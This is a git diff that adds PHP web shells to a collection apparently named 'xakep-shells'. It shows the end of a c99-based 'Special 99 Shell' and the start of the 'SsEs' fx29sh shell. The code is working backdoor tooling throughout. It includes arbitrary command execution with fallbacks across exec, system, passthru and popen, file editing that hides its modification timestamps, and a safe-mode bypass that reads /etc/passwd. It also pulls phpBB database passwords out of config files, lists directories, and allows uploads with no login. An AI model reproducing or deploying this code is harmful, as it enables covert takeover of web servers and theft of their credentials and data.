+   echo "<tr><td><b>Perms</b></td><td><a href=\"".$surl."act=chmod&f=".urlencode($f)."&d=".urlencode($d)."\">".view_perms_color($d.$f)."</a></td></tr><tr><td><b>Create time</b></td><td> ".date("d/m/Y H:i:s",filectime($d.$f))."</td></tr><tr><td><b>Access time</b></td><td> ".date("d/m/Y H:i:s",fileatime($d.$f))."</td></tr><tr><td><b>MODIFY time</b></td><td> ".date("d/m/Y H:i:s",filemtime($d.$f))."</td></tr></table><br>";
+   $fi = fopen($d.$f,"rb");
+   if ($fi)
+   {
+    if ($fullhexdump) {echo "<b>FULL HEXDUMP</b>"; $str = fread($fi,filesize($d.$f));}
+    else {echo "<b>HEXDUMP PREVIEW</b>"; $str = fread($fi,$hexdump_lines*$hexdump_rows);}
+    $n = 0;
+    $a0 = "00000000<br>";
+    $a1 = "";
+    $a2 = "";
+    for ($i=0; $i<strlen($str); $i++)
+    {
+     $a1 .= sprintf("%02X",ord($str[$i]))." ";
+     switch (ord($str[$i]))
+     {
+      case 0:  $a2 .= "<font>0</font>"; break;
+      case 32:
+      case 10:
+      case 13: $a2 .= "&nbsp;"; break;
+      default: $a2 .= htmlspecialchars($str[$i]);
+     }
+     $n++;
+     if ($n == $hexdump_rows)
+     {
+      $n = 0;
+      if ($i+1 < strlen($str)) {$a0 .= sprintf("%08X",$i+1)."<br>";}
+      $a1 .= "<br>";
+      $a2 .= "<br>";
+     }
+    }
+    //if ($a1 != "") {$a0 .= sprintf("%08X",$i)."<br>";}
+    echo "<table border=0 bgcolor=#666666 cellspacing=1 cellpadding=4><tr><td bgcolor=#666666>".$a0."</td><td bgcolor=000000>".$a1."</td><td bgcolor=000000>".$a2."</td></tr></table><br>";
+   }
+   $encoded = "";
+   if ($base64 == 1)
+   {
+    echo "<b>Base64 Encode</b><br>";
+    $encoded = base64_encode(file_get_contents($d.$f));
+   }
+   elseif($base64 == 2)
+   {
+    echo "<b>Base64 Encode + Chunk</b><br>";
+    $encoded = chunk_split(base64_encode(file_get_contents($d.$f)));
+   }
+   elseif($base64 == 3)
+   {
+    echo "<b>Base64 Encode + Chunk + Quotes</b><br>";
+    $encoded = base64_encode(file_get_contents($d.$f));
+    $encoded = substr(preg_replace("!.{1,76}!","'\\0'.\n",$encoded),0,-2);
+   }
+   elseif($base64 == 4)
+   {
+    $text = file_get_contents($d.$f);
+    $encoded = base64_decode($text);
+    echo "<b>Base64 Decode";
+    if (base64_encode($encoded) != $text) {echo " (failed)";}
+    echo "</b><br>";
+   }
+   if (!empty($encoded))
+   {
+    echo "<textarea cols=80 rows=10>".htmlspecialchars($encoded)."</textarea><br><br>";
+   }
+   echo "<b>HEXDUMP:</b><nobr> [<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=info&fullhexdump=1&d=".urlencode($d)."\">Full</a>] [<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=info&d=".urlencode($d)."\">Preview</a>]<br><b>Base64: </b>
+<nobr>[<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=info&base64=1&d=".urlencode($d)."\">Encode</a>]&nbsp;</nobr>
+<nobr>[<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=info&base64=2&d=".urlencode($d)."\">+chunk</a>]&nbsp;</nobr>
+<nobr>[<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=info&base64=3&d=".urlencode($d)."\">+chunk+quotes</a>]&nbsp;</nobr>
+<nobr>[<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=info&base64=4&d=".urlencode($d)."\">Decode</a>]&nbsp;</nobr>
+<P>";
+  }
+  elseif ($ft == "html")
+  {
+   if ($white) {@ob_clean();}
+   echo $r;
+   if ($white) {c99shexit();}
+  }
+  elseif ($ft == "txt") {echo "<pre>".htmlspecialchars($r)."</pre>";}
+  elseif ($ft == "ini") {echo "<pre>"; var_dump(parse_ini_file($d.$f,TRUE)); echo "</pre>";}
+  elseif ($ft == "phpsess")
+  {
+   echo "<pre>";
+   $v = explode("|",$r);
+   echo $v[0]."<br>";
+   var_dump(unserialize($v[1]));
+   echo "</pre>";
+  }
+  elseif ($ft == "exe")
+  {
+   $ext = explode(".",$f);
+   $c = count($ext)-1;
+   $ext = $ext[$c];
+   $ext = strtolower($ext);
+   $rft = ";";
+   foreach($exeftypes as $k=>$v)
+   {
+    if (in_array($ext,$v)) {$rft = $k; break;}
+   }
+   $cmd = str_replace("%f%",$f,$rft);
+   echo "<b>Execute file:</b><form action=\"".$surl."\" method=POST><input type=hidden name=act value=cmd><input type=\"text\" name=\"cmd\" value=\"".htmlspecialchars($cmd)."\" size=\"".(strlen($cmd)+2)."\"><br>Display in text-area<input type=\"checkbox\" name=\"cmd_txt\" value=\"1\" checked><input type=hidden name=\"d\" value=\"".htmlspecialchars($d)."\"><br><input type=submit name=submit value=\"Execute\"></form>";
+  }
+  elseif ($ft == "sdb") {echo "<pre>"; var_dump(unserialize(base64_decode($r))); echo "</pre>";}
+  elseif ($ft == "code")
+  {
+   if (ereg("php"."BB 2.(.*) auto-generated config file",$r))
+   {
+    $arr = explode("\n",$r);
+    if (count($arr == 18))
+    {
+     include($d.$f);
+     echo "<b>phpBB configuration is detected in this file!<br>";
+     if ($dbms == "mysql4") {$dbms = "mysql";}
+     if ($dbms == "mysql") {echo "<a href=\"".$surl."act=sql&sql_server=".htmlspecialchars($dbhost)."&sql_login=".htmlspecialchars($dbuser)."&sql_passwd=".htmlspecialchars($dbpasswd)."&sql_port=3306&sql_db=".htmlspecialchars($dbname)."\"><b><u>Connect to DB</u></b></a><br><br>";}
+     else {echo "But, you can't connect to forum sql-base, because db-software=\"".$dbms."\" is not supported by c99shell. Please, report us for fix.";}
+     echo "Parameters for manual connect:<br>";
+     $cfgvars = array("dbms"=>$dbms,"dbhost"=>$dbhost,"dbname"=>$dbname,"dbuser"=>$dbuser,"dbpasswd"=>$dbpasswd);
+     foreach ($cfgvars as $k=>$v) {echo htmlspecialchars($k)."='".htmlspecialchars($v)."'<br>";}
+     echo "</b><hr size=\"1\" noshade>";
+    }
+   }
+   echo "<div style=\"border : 0px solid #FFFFFF; padding: 1em; margin-top: 1em; margin-bottom: 1em; margin-right: 1em; margin-left: 1em; background-color: ".$highlight_background .";\">";
+   if (!empty($white)) {@ob_clean();}
+   highlight_file($d.$f);
+   if (!empty($white)) {c99shexit();}
+   echo "</div>";
+  }
+  elseif ($ft == "download")
+  {
+   @ob_clean();
+   header("Content-type: application/octet-stream");
+   header("Content-length: ".filesize($d.$f));
+   header("Content-disposition: attachment; filename=\"".$f."\";");
+   echo $r;
+   exit;
+  }
+  elseif ($ft == "notepad")
+  {
+   @ob_clean();
+   header("Content-type: text/plain");
+   header("Content-disposition: attachment; filename=\"".$f.".txt\";");
+   echo($r);
+   exit;
+  }
+  elseif ($ft == "img")
+  {
+   $inf = getimagesize($d.$f);
+   if (!$white)
+   {
+    if (empty($imgsize)) {$imgsize = 20;}
+    $width = $inf[0]/100*$imgsize;
+    $height = $inf[1]/100*$imgsize;
+    echo "<center><b>Size:</b>&nbsp;";
+    $sizes = array("100","50","20");
+    foreach ($sizes as $v)
+    {
+     echo "<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=img&d=".urlencode($d)."&imgsize=".$v."\">";
+     if ($imgsize != $v ) {echo $v;}
+     else {echo "<u>".$v."</u>";}
+     echo "</a>&nbsp;&nbsp;&nbsp;";
+    }
+    echo "<br><br><img src=\"".$surl."act=f&f=".urlencode($f)."&ft=img&white=1&d=".urlencode($d)."\" width=\"".$width."\" height=\"".$height."\" border=\"1\"></center>";
+   }
+   else
+   {
+    @ob_clean();
+    $ext = explode($f,".");
+    $ext = $ext[count($ext)-1];
+    header("Content-type: ".$inf["mime"]);
+    readfile($d.$f);
+    exit;
+   }
+  }
+  elseif ($ft == "edit")
+  {
+   if (!empty($submit))
+   {
+    if ($filestealth) {$stat = stat($d.$f);}
+    $fp = fopen($d.$f,"w");
+    if (!$fp) {echo "<b>Can't write to file!</b>";}
+    else
+    {
+     echo "<b>Saved!</b>";
+     fwrite($fp,$edit_text);
+     fclose($fp);
+     if ($filestealth) {touch($d.$f,$stat[9],$stat[8]);}
+     $r = $edit_text;
+    }
+   }
+   $rows = count(explode("\r\n",$r));
+   if ($rows < 10) {$rows = 10;}
+   if ($rows > 30) {$rows = 30;}
+   echo "<form action=\"".$surl."act=f&f=".urlencode($f)."&ft=edit&d=".urlencode($d)."\" method=POST><input type=submit name=submit value=\"Save\">&nbsp;<input type=\"reset\" value=\"Reset\">&nbsp;<input type=\"button\" onclick=\"location.href='".addslashes($surl."act=ls&d=".substr($d,0,-1))."';\" value=\"Back\"><br><textarea name=\"edit_text\" cols=\"122\" rows=\"".$rows."\">".htmlspecialchars($r)."</textarea></form>";
+  }
+  elseif (!empty($ft)) {echo "<center><b>Manually selected type is incorrect. If you think, it is mistake, please send us url and dump of \$GLOBALS.</b></center>";}
+  else {echo "<center><b>Unknown extension (".$ext."), please, select type manually.</b></center>";}
+ }
+}
+}
+else
+{
+ @ob_clean();
+ 
+ $imgequals = array(
+  "ext_tar"=>array("ext_tar","ext_r00","ext_ace","ext_arj","ext_bz","ext_bz2","ext_tbz","ext_tbz2","ext_tgz","ext_uu","ext_xxe","ext_zip","ext_cab","ext_gz","ext_iso","ext_lha","ext_lzh","ext_pbk","ext_rar","ext_uuf"),
+  "ext_php"=>array("ext_php","ext_php3","ext_php4","ext_php5","ext_phtml","ext_shtml","ext_htm"),
+  "ext_jpg"=>array("ext_jpg","ext_gif","ext_png","ext_jpeg","ext_jfif","ext_jpe","ext_bmp","ext_ico","ext_tif","tiff"),
+  "ext_html"=>array("ext_html","ext_htm"),
+  "ext_avi"=>array("ext_avi","ext_mov","ext_mvi","ext_mpg","ext_mpeg","ext_wmv","ext_rm"),
+  "ext_lnk"=>array("ext_lnk","ext_url"),
+  "ext_ini"=>array("ext_ini","ext_css","ext_inf"),
+  "ext_doc"=>array("ext_doc","ext_dot"),
+  "ext_js"=>array("ext_js","ext_vbs"),
+  "ext_cmd"=>array("ext_cmd","ext_bat","ext_pif"),
+  "ext_wri"=>array("ext_wri","ext_rtf"),
+  "ext_swf"=>array("ext_swf","ext_fla"),
+  "ext_mp3"=>array("ext_mp3","ext_au","ext_midi","ext_mid"),
+  "ext_htaccess"=>array("ext_htaccess","ext_htpasswd","ext_ht","ext_hta","ext_so")
+ );
+ if (!$getall)
+ {
+  header("Content-type: image/gif");
+  header("Cache-control: public");
+  header("Expires: ".date("r",mktime(0,0,0,1,1,2030)));
+  header("Cache-control: max-age=".(60*60*24*7));
+  header("Last-Modified: ".date("r",filemtime(__FILE__)));
+  foreach($imgequals as $k=>$v) {if (in_array($img,$v)) {$img = $k; break;}}
+  if (empty($images[$img])) {$img = "small_unk";}
+  if (in_array($img,$ext_tar)) {$img = "ext_tar";}
+  echo base64_decode($images[$img]);
+ }
+ else
+ {
+  foreach($imgequals as $a=>$b) {foreach ($b as $d) {if ($a != $d) {if (!empty($images[$d])) {echo("Warning! Remove \$images[".$d."]<br>");}}}}
+  natsort($images);
+  $k = array_keys($images);
+  echo  "<center>";
+  foreach ($k as $u) {echo $u.":<img src=\"".$surl."act=img&img=".$u."\" border=\"1\"><br>";}
+  echo "</center>";
+ }
+ exit;
+}
+?>
+</font>
+</td></tr></table><a bookmark="minipanel"><font face="Tahoma"><br></font><TABLE style="BORDER-COLLAPSE: collapse" cellSpacing=0 borderColorDark=#666666 cellPadding=5 height="1" width="100%" bgColor=#330000 borderColorLight=#c0c0c0 border=1>
+<tr><td width="100%" height="1" valign="top"><center><form action="<?php echo $surl; ?>"><input type=hidden name=act value="cmd">
+	<font face="Tahoma"><br/><b>&#399;mr &#304;&#351;l&#601;t:</b> </font> <input type=hidden name="d" value="<?php echo $dispd; ?>"><input type="text" name="cmd" size="50" value="<?php echo htmlspecialchars($cmd); ?>"><input type=hidden name="cmd_txt" value="1"><font face="Tahoma">&nbsp;</font><input type=submit name=submit value="&#304;&#351;l&#601;t!"><font face='Tahoma' size='1'><a bookmark="minipanel"><center>
+  <center><font face="Tahoma"><br/><b>Versiya Melumatlarini Axtar</b> </font>
+	<input type=hidden name=client value="firefox-a"><input type=hidden name=rls value="org.mozilla:en-US:official_s"><input type=hidden name=hl value=en>
+	<p>
+	<input id=sf maxLength=256 name=q value="<?php echo wordwrap(php_uname()); ?>" size=25><font face="Tahoma">&nbsp;&nbsp;
+</font>
+<input type=submit value="Axtar" name=btnG></p>
+</center>
+    	</form></td></tr></TABLE>
+						<font face="Tahoma">
+<br>
+					</font>
+<TABLE style="BORDER-COLLAPSE: collapse" cellSpacing=0 borderColorDark=#666666 cellPadding=5 height="116" width="100%" bgColor=#330000 borderColorLight=#c0c0c0 border=1>
+<tr>
+  <td width="50%" height="83" valign="top"><center>
+    <div align="center"><strong><font face="Tahoma">Qorunman&#305; Ke&ccedil;</font></strong><font face="Tahoma"><strong>, 
+		Fayl Oxu [ByPass Method 2]</strong></font></div>
+    <font face="Tahoma">
+    <br>
+    </font>
+    <form action="<?php echo $surl; ?>" method="post">
+      <div align="center">
+      <font face="Tahoma">&#399;mr S&#601;tiri: </font> 
+		<input type="text" name="file" value="/etc/passwd/" size="11" tabindex="1"><font face="Tahoma">
+		</font> <input type="submit" value="Fayl&#305; Oxu"><font face="Tahoma"><br><br> 
+		M&#601;s&#601;l&#601;n: /etc/passwd/<br>
+      <?php
+      function rsg_read()
+	{	
+	$test="";
+	$temp=tempnam($test, "cx");
+	$file=$_REQUEST['file'];	
+	$get=htmlspecialchars($file);
+	echo "</br>Trying To Get File <font color=#000099><b>$get</b></font><br>";
+	if(copy("compress.zlib://".$file, $temp)){
+	$fichier = fopen($temp, "r");
+	$action = fread($fichier, filesize($temp));
+	fclose($fichier);
+	$source=htmlspecialchars($action);
+
+
+	echo "<div class=\"shell\"></br><b>Reading $get:</b><br><br><textarea rows=10 cols=50>$source</textarea><br>";
+	unlink($temp);
+	} else {
+	echo("</br><FONT COLOR=\"RED\"><CENTER>Sorry... File
+	<B>".htmlspecialchars($file)."</B> dosen't exists or you don't have
+	access.</CENTER></FONT>");
+			}
+	echo "</div>";
+	}
+	
+	if(isset($_REQUEST['file']))
+{
+rsg_read();
+}
+	
+	?>
+	
+	<?
+	
+	function rsg_glob()
+{
+$chemin=$_REQUEST['directory'];
+$files = glob("$chemin*");
+echo "</br>Trying To List Folder <font color=#000099><b>$chemin</b></font><br>";
+foreach ($files as $filename) {
+	echo "<pre>";
+   echo "$filename\n";
+   echo "</pre>";
+}
+}
+
+if(isset($_REQUEST['directory']))
+{
+rsg_glob();
+}
+
+?>
+
+          <br>
+      </font>
+      </div>
+    </form>
+    </td>
+  <td width="50%" height="83" valign="top"><center>
+   <center>
+     <font face="Tahoma"><strong>Qorunmani Ke&ccedil;, Qovluq Oxu [ByPass Method 1]</strong>:     
+     </font>
+		<p>&nbsp;</p>
+		<p>&nbsp;</p>
+     <form action="<?php echo $surl; ?>" method="post">
+      <div align="center"><font face="Tahoma"><br>
+      	&#399;mr S&#601;tiri: </font> <input type="text" name="directory"><font face="Tahoma">
+		</font> <input type="submit" value="&#304;ndi Oxu!"><font face="Tahoma"><br><br> 
+		M&#601;s&#601;l&#601;n: /etc/<br>
+
+    	</font>
+
+    </form></center>
+    </td>
+</tr></TABLE>
+					<font face="Tahoma">
+<br></font><TABLE style="BORDER-COLLAPSE: collapse" cellSpacing=0 borderColorDark=#666666 cellPadding=5 height="1" width="100%" bgColor=#330000 borderColorLight=#c0c0c0 border=1>
+<tr>
+ <td width="50%" height="1" valign="top"><center>
+   <b><font face="Tahoma">Axtar&#305;&#351;</font></b><font face="Tahoma">
+   </font>
+   <form method="POST"><input type=hidden name=act value="Simdi Ara!"><input type=hidden name="d" value="<?php echo $dispd; ?>"><input type="text" name="search_name" size="29" value="(.*)"><font face="Tahoma">&nbsp;</font><input type="checkbox" name="search_name_regexp" value="1"  checked><font face="Tahoma">&nbsp;</font><input type=submit name=submit value="Search"></form></center></p></td>
+ <td width="50%" height="1" valign="top"><center>
+   <font face="Tahoma">
+   <b>Upload</b>
+   </font>
+   <form method="POST" ENCTYPE="multipart/form-data"><input type=hidden name=act value="upload"><input type="file" name="uploadfile"><input type=hidden name="miniform" value="1"><font face="Tahoma">&nbsp;</font><input type=submit name=submit value="Upload Et!"><font face="Tahoma"><br><?php echo $wdt; ?></font></form></center></td>
+</tr>
+</table>
+			<font face="Tahoma">
+<br></font><TABLE style="BORDER-COLLAPSE: collapse" cellSpacing=0 borderColorDark=#666666 cellPadding=5 height="1" width="100%" bgColor=#330000 borderColorLight=#c0c0c0 border=1><tr><td width="50%" height="1" valign="top"><center>
+  <b><strong><font face="Tahoma">Qovluq Yarat</font></strong><p><form action="<?php echo $PHP_SELF; ?>"><input type=hidden name=act value="mkdir"><input type=hidden name="d" value="<?php echo $dispd; ?>"><input type="text" name="mkdir" size="50" value="<?php echo $dispd; ?>"><font face="Tahoma">&nbsp;</font><input type=submit value="Yarat"><font face="Tahoma"><br><?php echo $wdt; ?></font></form></center></td><td width="50%" height="1" valign="top"><center>
+    <strong><font face="Tahoma">Fayl Yarat</font></strong><font face="Tahoma">
+    </font>
+    <form method="POST"><input type=hidden name=act value="mkfile"><input type=hidden name="d" value="<?php echo $dispd; ?>"><input type="text" name="mkfile" size="50" value="<?php echo $dispd; ?>"><input type=hidden name="ft" value="edit"><font face="Tahoma">&nbsp;</font><input type=submit value="Yarat"><font face="Tahoma"><br><?php echo $wdt; ?></font></form></center></td></tr></table>
+
+			<font face="Tahoma">
+
+<br></font><TABLE style="BORDER-COLLAPSE: collapse" cellSpacing=0 borderColorDark=#666666 cellPadding=5 height="1" width="100%" bgColor=#330000 borderColorLight=#c0c0c0 border=1><tr><td width="50%" height="1" valign="top"><center>
+  <font face="Tahoma">
+  <b>Qovluqa Get</b>
+  </font>
+  <form action="<?php echo $surl; ?>"><input type=hidden name=act value="ls"><input type="text" name="d" size="50" value="<?php echo $dispd; ?>"><font face="Tahoma">&nbsp;</font><input type=submit value="Get"></form></center></td><td width="50%" height="1" valign="top"><center>
+    <font face="Tahoma">
+    <b>Fayla Get</b>
+    </font>
+    <form action="<?php echo $surl; ?>"><input type=hidden name=act value="gofile"><input type=hidden name="d" value="<?php echo $dispd; ?>"><input type="text" name="f" size="50" value="<?php echo $dispd; ?>"><font face="Tahoma">&nbsp;</font><input type=submit value="Get"></form></center></td></tr></table>
+</td>
+</tr>
+</TABLE>
+<br><TABLE width="100%" height=1 border=1 cellPadding=0 cellSpacing=0 borderColorLight=#c0c0c0 borderColorDark=#666666 bgColor=#330000 style="BORDER-COLLAPSE: collapse">
+  <tr><td width="990" height="1" valign="top">
+<font face="Tahoma">
+<?php
+echo "
+<table border='0' width='100%' cellspacing='0' cellpadding='0'>
+	<tr>
+		<td><li><font face='Tahoma' size='1' color='#FF0000'>H&#601;cm</font></li></td>
+		<td align='center'><font face='Tahoma' size='1' color='#FF0000'>:</font></td>
+		<td><font face='Tahoma' size='1' color='#00FF00'>".view_size($total)."</font></td>
+		<td><li><font face='Tahoma' size='1' color='#FF0000'>Sizin Ip'niz</font></li></td>
+		<td align='center'><font face='Tahoma' size='1' color='#FF0000'>:</font></td>
+		<td><a href=http://".$_SERVER['REMOTE_ADDR']."
+		<font face='Tahoma' size='1' color='#00FF00'>".$_SERVER['REMOTE_ADDR']."</font></td>
+	</tr>
+	<tr>
+		<td><li><font face='Tahoma' size='1' color='#FF0000'>Bos H&#601;cm</font></li></td>
+		<td align='center'><font face='Tahoma' size='1' color='#FF0000'>:</font></td>
+		<td><font face='Tahoma' size='1' color='#00FF00'>".view_size($free)."</font></td>
+		<td><li><font face='Tahoma' size='1' color='#FF0000'>Server</font></li></td>
+		<td align='center'><font face='Tahoma' size='1' color='#FF0000'>:</font></td>
+		<td><a href=http://".gethostbyname($_SERVER['HTTP_HOST'])."
+		<font face='Tahoma' size='1' color='#00FF00'>".gethostbyname($_SERVER['HTTP_HOST'])."</font></td>
+	</tr>
+	<tr>
+		<td><li><font face='Tahoma' size='1' color='#FF0000'>Bos Faiz</font></li></td>
+		<td align='center'><font face='Tahoma' size='1' color='#FF0000'>:</font></td>
+		<td><font face='Tahoma' size='1' color='#00FF00'>%".$free_percent."</font></td>
+		<td><li><font face='Tahoma' size='1' color='#FF0000'>D&#601;st&#601;k Server</font></li></td>
+		<td align='center'><font face='Tahoma' size='1' color='#FF0000'>:</font></td>
+		<td><a href=$dsunucu
+		<td><font face='Tahoma' size='1' color='#00FF00'>http://www.caspian-pirates.org</font></td>
+	</tr>
+</table>
+";
+?></font><hr><p align='center'><font face='Tahoma' size='1'>[ Special 99 Shell 
+v1.0 || Developing by </font>
+<font face='Tahoma' size='2'> <font color='white'><a href='http://caspian-pirates.org'>
+<font face="Tahoma"><b>&#3628;a&#1106;&#3648;t&#1108;_&#3628;&#3663;l&#358;</b></font></a></font> </font><font face='Tahoma' size='1'>
+|| <a href='http://www.Caspian-Pirates.OrG'>
+<font face="Tahoma">Caspian-Pirates.OrG</font></a> ]</font></p>
+</td></tr></table>+
+<br/></body></html><?php chdir($lastdir); c99shexit(); ?>
\ No newline at end of file
diff --git a/xakep-shells/PHP/SsEs.php.php.txt b/xakep-shells/PHP/SsEs.php.php.txt
new file mode 100644
index 0000000..32ea97f
--- /dev/null
+++ b/xakep-shells/PHP/SsEs.php.php.txt
@@ -0,0 +1,3309 @@
+<?php
+/********************************************/
+/* dhie-Q fx29sh v1 06.2008                 */
+/* Re-coded dhie-Q modified By  SsEs     */
+/* #www.h4cks.in           */
+/*******************************************/
+$sh_id = "RmFUYUxpc1RpQ3pfRnggRngyOVNoZUxMIHY=";
+$sh_ver = "0.01 07.2008";
+$sh_name = "SsEs 191814 Shell Modified ";
+$sh_mainurl = "http://www.h4cks.in/";
+$html_start = ''.
+'<html><head>
+<title>'.getenv("HTTP_HOST").' - '.$sh_name.'</title>
+<style type="text/css">
+<!--
+body,table { font-family:verdana;font-size:11px;color:white;background-color:black; }
+table { width:100%; }
+table,td { border:1px solid #808080;margin-top:2;margin-bottom:2;padding:5px; }
+a { color:lightblue;text-decoration:none; }
+a:active { color:#00FF00; }
+a:link { color:#5B5BFF; }
+a:hover { text-decoration:underline; }
+a:visited { color:#99CCFF; }
+input,select,option { font:8pt tahoma;color:#FFFFFF;margin:2;border:1px solid #666666; }
+textarea { color:#dedbde;font:fixedsys bold;border:1px solid #666666;margin:2; }
+.fleft { float:left;text-align:left; }
+.fright { float:right;text-align:right; }
+#pagebar { font:10pt tahoma;padding:5px; border:3px solid #1E1E1E; border-collapse:collapse; }
+#pagebar td { vertical-align:top; }
+#pagebar p { font:8pt tahoma;}
+#pagebar a { font-weight:bold;color:#00FF00; }
+#pagebar a:visited { color:#00CE00; }
+#mainmenu { text-align:center; }
+#mainmenu a { text-align: center;padding: 0px 5px 0px 5px; }
+#maininfo,.barheader,.barheader2 { text-align:center; }
+#maininfo td { padding:3px; }
+.barheader { font-weight:bold;padding:5px; }
+.barheader2 { padding:5px;border:2px solid #1F1F1F; }
+.contents,.explorer { border-collapse:collapse;}
+.contents td { vertical-align:top; }
+.mainpanel { border-collapse:collapse;padding:5px; }
+.barheader,.mainpanel table,td { border:1px solid #333333; }
+.mainpanel input,select,option { border:1px solid #333333;margin:0; }
+input[type="submit"] { border:1px solid #000000; }
+input[type="text"] { padding:3px;}
+.shell { background-color:#C0C0C0;color:#000080;padding:5px; }
+.fxerrmsg { color:red; font-weight:bold; }
+#pagebar,#pagebar p,h1,h2,h3,h4,form { margin:0; }
+#pagebar,.mainpanel,input[type="submit"] { background-color:#4A4A4A; }
+.barheader2,input,select,option,input[type="submit"]:hover { background-color:#333333; }
+textarea,.mainpanel input,select,option { background-color:#000000; }
+// -->
+</style>
+</head>
+<body>
+';
+//Authentication
+$login = ""; 
+$pass = "";
+$md5_pass = ""; //Password yg telah di enkripsi dg md5. Jika kosong, md5($pass).
+$host_allow = array("*"); //Contoh: array("192.168.0.*","127.0.0.1")
+$login_txt = "Restricted Area"; //Pesan HTTP-Auth
+$accessdeniedmess = "<a href=\"$sh_mainurl\">".$sh_name."</a>: access denied";
+$gzipencode = TRUE;
+$updatenow = FALSE; //Jika TRUE, update shell sekarang.
+$c99sh_updateurl = $sh_mainurl."
+_update.php";
+$c99sh_sourcesurl = $sh_mainurl."fx29sh_source.txt";
+//$c99sh_updateurl = "http://localhost/toolz/fx29sh_update.php";
+//$c99sh_sourcesurl = "http://localhost/toolz/fx29sh_source.txt";
+$filestealth = TRUE; //TRUE, tidak merubah waktu modifikasi dan akses.
+$curdir = "./";
+$tmpdir = ""; 
+$tmpdir_log = "./";
+$log_email = "q.dhie@yahoo.com"; //email untuk pengiriman log.
+$sort_default = "0a"; //Pengurutan, 0 - nomor kolom. "a"scending atau "d"escending
+$sort_save = TRUE; //Jika TRUE, simpan posisi pengurutan menggunakan cookies.
+$sess_cookie = "c99shvars"; //Nama variabel Cookie
+$usefsbuff = TRUE; //Buffer-function
+$copy_unset = FALSE; //Hapus file yg telah di-copy setelah dipaste
+$hexdump_lines = 8;
+$hexdump_rows = 24;
+$win = strtolower(substr(PHP_OS,0,3)) == "win";
+$disablefunc = @ini_get("disable_functions");
+if (!empty($disablefunc)) {
+  $disablefunc = str_replace(" ","",$disablefunc);
+  $disablefunc = explode(",",$disablefunc);
+}
+//Functions
+function get_phpini() {
+  function U_wordwrap($str) {
+    $str = @wordwrap(@htmlspecialchars($str), 100, '<wbr />', true);
+    return @preg_replace('!(&[^;]*)<wbr />([^;]*;)!', '$1$2<wbr />', $str);
+  }
+  function U_value($value) {
+    if ($value == '') return '<i>no value</i>';
+    if (@is_bool($value)) return $value ? 'TRUE' : 'FALSE';
+    if ($value === null) return 'NULL';
+    if (@is_object($value)) $value = (array) $value;
+    if (@is_array($value)) {
+      @ob_start();
+      print_r($value);
+      $value = @ob_get_contents();
+      @ob_end_clean();
+    }
+    return U_wordwrap((string) $value);
+  }
+  if (@function_exists('ini_get_all')) {
+    $r = "";
+    echo "<table><tr class=barheader><td>Directive</td><td>Local Value</td><td>Global Value</td></tr>";
+    foreach (@ini_get_all() as $key=>$value) {
+      $r .= "<tr><td>".$key."</td><td><div align=center>".U_value($value['local_value'])."</div></td><td><div align=center>".U_value($value['global_value'])."</div></td></tr>";
+    }
+    echo $r;
+    echo "</table>";
+  }
+}
+function disp_drives($curdir,$surl) {
+  $letters = "";
+  $v = explode("\\",$curdir);
+  $v = $v[0];
+  foreach (range("A","Z") as $letter) {
+    $bool = $isdiskette = $letter == "A";
+    if (!$bool) {$bool = is_dir($letter.":\\");}
+    if ($bool) {
+      $letters .= "<a href=\"".$surl."act=ls&d=".urlencode($letter.":\\")."\"".
+      ($isdiskette?" onclick=\"return confirm('Make sure that the diskette is inserted properly, otherwise an error may occur.')\"":"")."> [";
+      if ($letter.":" != $v) {$letters .= $letter;}
+      else {$letters .= "<font color=yellow>".$letter."</font>";}
+      $letters .= "]</a> ";
+    }
+  }
+  if (!empty($letters)) {Return $letters;}
+  else {Return "None";}
+}
+if (is_callable("disk_free_space")) {
+  function disp_freespace($curdrv) {
+    $free = disk_free_space($curdrv);
+    $total = disk_total_space($curdrv);
+    if ($free === FALSE) {$free = 0;}
+    if ($total === FALSE) {$total = 0;}
+    if ($free < 0) {$free = 0;}
+    if ($total < 0) {$total = 0;}
+    $used = $total-$free;
+    $free_percent = round(100/($total/$free),2)."%";
+    $free = view_size($free);
+    $total = view_size($total);
+    return "$free of $total ($free_percent)";
+  }
+}
+//w4ck1ng Shell
+if (!function_exists("myshellexec")) {
+  if(is_callable("popen")) {
+    function myshellexec($cmd) {
+      if (!($p=popen("($cmd)2>&1","r"))) { return "popen Disabled!"; }
+      while (!feof($p)) {
+        $line=fgets($p,1024);
+        $out .= $line;
+      }
+      pclose($p);
+      return $out;
+    }
+  } else {
+    function myshellexec($cmd) {
+      global $disablefunc;
+      $result = "";
+      if (!empty($cmd)) {
+        if (is_callable("exec") and !in_array("exec",$disablefunc)) {
+          exec($cmd,$result);
+          $result = join("\n",$result);
+        } elseif (($result = $cmd) !== FALSE) {
+        } elseif (is_callable("system") and !in_array("system",$disablefunc)) {
+          $v = @ob_get_contents(); @ob_clean(); system($cmd); $result = @ob_get_contents(); @ob_clean(); echo $v;
+        } elseif (is_callable("passthru") and !in_array("passthru",$disablefunc)) {
+          $v = @ob_get_contents(); @ob_clean(); passthru($cmd); $result = @ob_get_contents(); @ob_clean(); echo $v;
+        } elseif (is_resource($fp = popen($cmd,"r"))) {
+          $result = "";
+          while(!feof($fp)) { $result .= fread($fp,1024); }
+          pclose($fp);
+        }
+      }
+      return $result;
+    }
+  }
+}
+function ex($cfe) {
+  $res = '';
+  if (!empty($cfe)) {
+    if(function_exists('exec')) {
+      @exec($cfe,$res);
+      $res = join("\n",$res);
+    } elseif(function_exists('shell_exec')) {
+      $res = @shell_exec($cfe);
+    } elseif(function_exists('system')) {
+      @ob_start();
+      @system($cfe);
+      $res = @ob_get_contents();
+      @ob_end_clean();
+    } elseif(function_exists('passthru')) {
+      @ob_start();
+      @passthru($cfe);
+      $res = @ob_get_contents();
+      @ob_end_clean();
+    } elseif(@is_resource($f = @popen($cfe,"r"))) {
+      $res = "";
+      while(!@feof($f)) { $res .= @fread($f,1024); }
+      @pclose($f);
+    } else { $res = "Ex() Disabled!"; }
+  }
+  return $res;
+}
+function which($pr) {
+  $path = ex("which $pr");
+  if(!empty($path)) { return $path; } else { return $pr; }
+}
+//End of w4ck1ng Shell
+
+//Start Enumerate function
+$hostname_x = php_uname(n);
+$itshome = getcwd();
+if (!$win) {
+  $itshome = str_replace("/home/","~",$itshome);
